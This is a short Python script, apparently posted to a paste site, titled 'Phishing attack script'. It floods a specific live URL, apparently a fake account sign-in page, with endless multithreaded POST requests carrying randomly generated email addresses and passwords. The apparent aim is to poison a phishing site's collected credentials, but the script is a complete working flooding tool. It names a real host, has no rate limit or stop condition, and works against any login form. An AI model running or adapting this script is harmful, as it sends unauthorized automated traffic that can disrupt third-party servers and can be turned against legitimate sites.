· 5 years ago · Apr 24, 2020, 06:56 PM
1#!/usr/bin/python3
2# Phishing attack script
3# https://greysec.net/
4import requests, json, random, threading
5
6url = 'http://044ac74.wcomhost.com/newdemary/customer_center/customer-IDPP00C113/myaccount/signin/'
7sent_logins = 0
8
9email_domains = [
10 'gmail.com',
11 'yahoo.com',
12 'hotmail.com',
13 'outlook.com',
14 ]
15
16seperator_list = [
17 '',
18 '_',
19 '.'
20 ]
21
22# Load namelist
23with open('names.json', 'r') as namefile:
24 namelist = json.load(namefile)
25 namefile.close()
26
27# Load password list
28with open('passwords.json','r') as passfile:
29 passlist = json.load(passfile)
30 passfile.close()
31
32
33def send_request():
34 while True:
35 # Generate an email address
36 global sent_logins
37
38 num = random.randint(1,9999)
39 name = random.choice(namelist)
40 seperator = random.choice(seperator_list)
41 domain = random.choice(email_domains)
42
43 email = f'{name}{seperator}{num}@{domain}'
44
45 # Get a password
46 password = random.choice(passlist)
47 response = requests.post(url, data={'login_email':email, 'login_password':password})
48 sent_logins += 1
49 print(f'[info] Sent login {email}:{password}')
50 print(f'[info] Sent logins: {sent_logins}')
51 if response.status_code != 200:
52 print('[alert] Got status code {} from website'.format(response.status_code))
53
54
55threadlist = []
56
57for thread in range(4):
58 thread = threading.Thread(target=send_request)
59 threadlist.append(thread)
60 thread.start()